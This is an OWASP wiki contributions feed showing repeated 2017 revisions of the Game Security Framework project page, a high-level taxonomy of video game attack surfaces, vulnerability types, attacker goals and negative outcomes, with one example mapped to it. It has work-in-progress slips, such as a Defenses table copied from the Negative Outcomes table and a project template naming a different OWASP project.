OWASP - User contributions [en]

OWASP Game Security Framework Project

2017-03-23T15:20:38Z

Jason Haddix:

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

In 2016 the videogame market became 99.6 Billion dollar industry... any why shouldn't it be? Some of the most prolific and complex software developed today are video games. They are professionally played, sponsored, scrutinized, monetized, and celebrated, just like many sports. They handle clients, servers, web components, monetary transfers, social interactions, virtual markets, etc, with every bit the need of security that most internet hosted apps have (if not more in some cases). The GSF is designed to help threat model gaming issues that have devastated new games. Most importantly we hope the GSF can help new developers and security testers alike root out bugs in your favorite titles.

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> , which could have been prevented by <code>DEFENSE.</code>”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* QA
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* Kevin Hemmingsen
* Troy Cunefare
* Ryan Lawrence
* Martin Mendoza
* Koray Algan
* Tom Simkovic
* Matt Espinoza
* Chad Lynch

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* January, 2017: Doing a complete redesign of the project.
* March 2017: Presenting version 1.0 at HouSecCon 2017.

==Classifications==

{| width="200" cellpadding="2"
|-
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|The economic system that exists within the game.
|-
|'''Game Mechanics'''
|The physics engine, logic, and other environmental components within the game.
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Sub-project Leader ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Sub-project Leader ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Attacker Goals ==

This list refers to what a given attacker might be trying to accomplish within the game by performing a given attack. This could relate very closely (or not) with the technical impact or business impact cause by the behavior.

{| class="wikitable" border="1" style="text-align: left"
! Attacker Goal
! Description
|-
| '''Avoid Damage'''
|Allows the player to avoid being killed by other players or NPCs.
|-
| '''Gain Gear'''
|Improve the amount or quality of gear the player has.
|-
| '''Gain In-game Currency'''
|Gain more currency than would normally be allowed.
|-
| '''Enhance Gear'''
|Give weapons or other gear powers that they wouldn't normally have.
|-
| '''Take Opponent Offline'''
|Take a player out of the game so that the attacker's position is improved.
|-
|'''Skip Content'''
|Allows player to skip content resuting in a faster completion or objective time
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attacker Goals Project ==

The Attacker Goals Project provides information on what types of outcomes attackers might try to achieve within or outside of the game they're attacking.

== Sub-project Leader ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Negative Outcomes ==

The following is a list of possible negative outcomes that can occur as the result of someone successfully attacking a given game.

{| class="wikitable" border="1" style="text-align: left"
! Outcomes
! Description
|-
| '''Currency Magnification'''
|A player ends up with more currency than they were supposed to have.
|-
| '''Player Anger'''
|Players become extremely agitated by one or more bugs.
|-
| '''Players Stop Playing the Game'''
|Players become so frustrated with the bugs and exploits that they stop playing and/or paying for the game.
|-
| '''Invulnerable Positions'''
|Locations on the map make bases or players unassailable and therefore invulnerable.
|-
| '''Item Multiplication'''
|Items are duplicated, multiplied, or otherwise increased in an unintended way.
|-
|'''Unfair Ladder Victory'''
|A victory is scored in favor of a player or team when they should not have won.
|-
|'''Unauthorized Admin Command Use'''
|Regular users are somehow able to execute administrative commands.
|-
|'''Lost Revenue'''
|The game company loses revenue due to bugs, hacks, and player anger.
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Negative Outcomes Project? ==

The Negative Outcomes Project provides information on what types of situations could manifest within the game if bugs or exploits are not successfully addressed.

== Project Leader ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

{| class="wikitable" border="1" style="text-align: left"
! Outcomes
! Description
|-
| '''Currency Magnification'''
|A player ends up with more currency than they were supposed to have.
|-
| '''Player Anger'''
|Players become extremely agitated by one or more bugs.
|-
| '''Players Stop Playing the Game'''
|Players become so frustrated with the bugs and exploits that they stop playing and/or paying for the game.
|-
| '''Invulnerable Positions'''
|Locations on the map make bases or players unassailable and therefore invulnerable.
|-
| '''Item Multiplication'''
|Items are duplicated, multiplied, or otherwise increased in an unintended way.
|-
|'''Unfair Ladder Victory'''
|A victory is scored in favor of a player or team when they should not have won.
|-
|'''Unauthorized Admin Command Use'''
|Regular users are somehow able to execute administrative commands.
|-
|'''Lost Revenue'''
|The game company loses revenue due to bugs, hacks, and player anger.
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

== Real-world Examples of Gaming Vulnerabilities==

''Vulnerability''

{| class="wikitable"
!ID
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Goal
! style="font-weight: bold;" | Techical Impact
!Business Impact
! style="font-weight: bold;" | Defense
! Ref
!Game
! Genre
|-
|V1
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger
|Players leave, Lost Revenue
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
|
| 3PS/1PS/MMO
|-
|VN1
| colspan="10" style="text-align: center;" | "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating, which could have been prevented by <code>CRYPTOGRAPHIC INTEGRITY CHECKS ON GAME CLIENT</code>”
|-
|
|
|
|
|
|
|
|
|
|
|
|-
|
|
|
|
|
|
|
|
|
|
|
|-
|
|
|
|
|
|
|
|
|
|
|
|-
|
|
|
|
|
|
|
|
|
|
|
|}
''Working Data Collection Spreadsheet:''

https://docs.google.com/spreadsheets/d/1Og08wyHsqtODBDkU_M2zHAvdxc63GSu-OmT8NjCc9Ak/edit#gid=0

:

{{Social Media Links}}

= Community =

We are actively looking for people to help in the following areas:
* Improving the framework schema, e.g., vulns, attack surfaces, technical impacts, business impacts, defenses, etc.
* Adding content to any of the various sections
* Input from avid gamers on how useful this is to them
* Input from app security experts
* Input from security types working at gaming companies
* Input from game company business types
If you have interest in helping, reach out to us and we'll make you a contributor.

= Testing Tools =

== Commonly Used Game Hacking Tools ==

{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs></headertabs>

[[Category:OWASP_Project]]
[[Category:OWASP_Document]]
[[Category:OWASP_Download]]
[[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-03-23T15:01:29Z

Jason Haddix:

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

In 2016 the videogame market became 99.6 Billion dollar industry... any why shouldn't it be? Some of the most prolific and complex software developed today are video games. They are professionally played, sponsored, scrutinized, monetized, and celebrated, just like many sports. They handle clients, servers, web components, monetary transfers, social interactions, virtual markets, etc, with every bit the need of security that most internet hosted apps have (if not more in some cases). The GSF is designed to help threat model gaming issues that have devastated new games. Most importantly we hope the GSF can help new developers and security testers alike root out bugs in your favorite titles.

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> , which could have been prevented by <code>DEFENSE.</code>”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* QA
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* Kevin Hemmingsen
* Troy Cunefare
* Ryan Lawrence
* Martin Mendoza
* Koray Algan
* Tom Simkovic
* Matt Espinoza
* Chad Lynch

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* January, 2017: Doing a complete redesign of the project.
* March 2017: Presenting version 1.0 at HouSecCon 2017.

==Classifications==

{| width="200" cellpadding="2"
|-
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|The economic system that exists within the game.
|-
|'''Game Mechanics'''
|The physics engine, logic, and other environmental components within the game.
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Sub-project Leader ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| class="wikitable" border="1" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Sub-project Leader ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Attacker Goals ==

This list refers to what a given attacker might be trying to accomplish within the game by performing a given attack. This could relate very closely (or not) with the technical impact or business impact cause by the behavior.

{| class="wikitable" border="1" style="text-align: left"
! Attacker Goal
! Description
|-
| '''Avoid Damage'''
|Allows the player to avoid being killed by other players or NPCs.
|-
| '''Gain Gear'''
|Improve the amount or quality of gear the player has.
|-
| '''Gain In-game Currency'''
|Gain more currency than would normally be allowed.
|-
| '''Enhance Gear'''
|Give weapons or other gear powers that they wouldn't normally have.
|-
| '''Take Opponent Offline'''
|Take a player out of the game so that the attacker's position is improved.
|-
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attacker Goals Project ==

The Attacker Goals Project provides information on what types of outcomes attackers might try to achieve within or outside of the game they're attacking.

== Sub-project Leader ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Negative Outcomes ==

The following is a list of possible negative outcomes that can occur as the result of someone successfully attacking a given game.

{| class="wikitable" border="1" style="text-align: left"
! Technical Impact
! Description
|-
| '''Currency Magnification'''
|A player ends up with more currency than they were supposed to have.
|-
| '''Player Anger'''
|Players become extremely agitated by one or more bugs.
|-
| '''Players Stop Playing the Game'''
|Players become so frustrated with the bugs and exploits that they stop playing and/or paying for the game.
|-
| '''Invulnerable Positions'''
|Locations on the map make bases or players unassailable and therefore invulnerable.
|-
| '''Item Multiplication'''
|Items are duplicated, multiplied, or otherwise increased in an unintended way.
|-
|'''Unfair Ladder Victory'''
|A victory is scored in favor of a player or team when they should not have won.
|-
|'''Unauthorized Admin Command Use'''
|Regular users are somehow able to execute administrative commands.
|}

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Negative Outcomes Project? ==

The Negative Outcomes Project provides information on what types of situations could manifest within the game if bugs or exploits are not successfully addressed.

== Project Leader ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

== Real-world Examples of Gaming Vulnerabilities==

''Vulnerability''

{| class="wikitable"
!ID
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Goal
! style="font-weight: bold;" | Techical Impact
!Business Impact
! style="font-weight: bold;" | Defense
! Ref
!Game
! Genre
|-
|V1
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger
|Players leave, Lost Revenue
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
|
| 3PS/1PS/MMO
|-
|VN1
| colspan="10" style="text-align: center;" | "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating, which could have been prevented by <code>CRYPTOGRAPHIC INTEGRITY CHECKS ON GAME CLIENT</code>”
|-
|
|
|
|
|
|
|
|
|
|
|
|-
|
|
|
|
|
|
|
|
|
|
|
|-
|
|
|
|
|
|
|
|
|
|
|
|-
|
|
|
|
|
|
|
|
|
|
|
|}
''Working Data Collection Spreadsheet:''

https://docs.google.com/spreadsheets/d/1Og08wyHsqtODBDkU_M2zHAvdxc63GSu-OmT8NjCc9Ak/edit#gid=0

:

{{Social Media Links}}

= Community =

We are actively looking for people to help in the following areas:
* Improving the framework schema, e.g., vulns, attack surfaces, technical impacts, business impacts, defenses, etc.
* Adding content to any of the various sections
* Input from avid gamers on how useful this is to them
* Input from app security experts
* Input from security types working at gaming companies
* Input from game company business types
If you have interest in helping, reach out to us and we'll make you a contributor.

= Testing Tools =

== Commonly Used Game Hacking Tools ==

{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs></headertabs>

[[Category:OWASP_Project]]
[[Category:OWASP_Document]]
[[Category:OWASP_Download]]
[[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-03-21T05:50:52Z

Jason Haddix: /* Project Leaders */

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

